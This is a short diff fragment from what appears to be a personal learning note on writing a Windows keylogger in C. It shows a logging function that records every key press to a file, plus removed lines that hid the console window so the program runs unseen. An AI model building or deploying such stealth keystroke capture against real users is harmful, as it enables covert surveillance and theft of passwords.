impulsado/wannaNotes/Projects/ILEARNYOU/ILY - Easy/ILY - Keylogger/ILY - Keylogger - Code_V1.md

  * @post All key presses are logged to "log.txt" until the process is terminated.
  */
 void startLogging() {
-    // Hide console while executing the program.
-We want to be invisible !!
-    // To stop the process: taskkill /IM keylogger.exe /F ShowWindow(GetConsoleWindow(), SW_HIDE);

     while (true) {
         Sleep(10);  // Avoid excessive CPU usage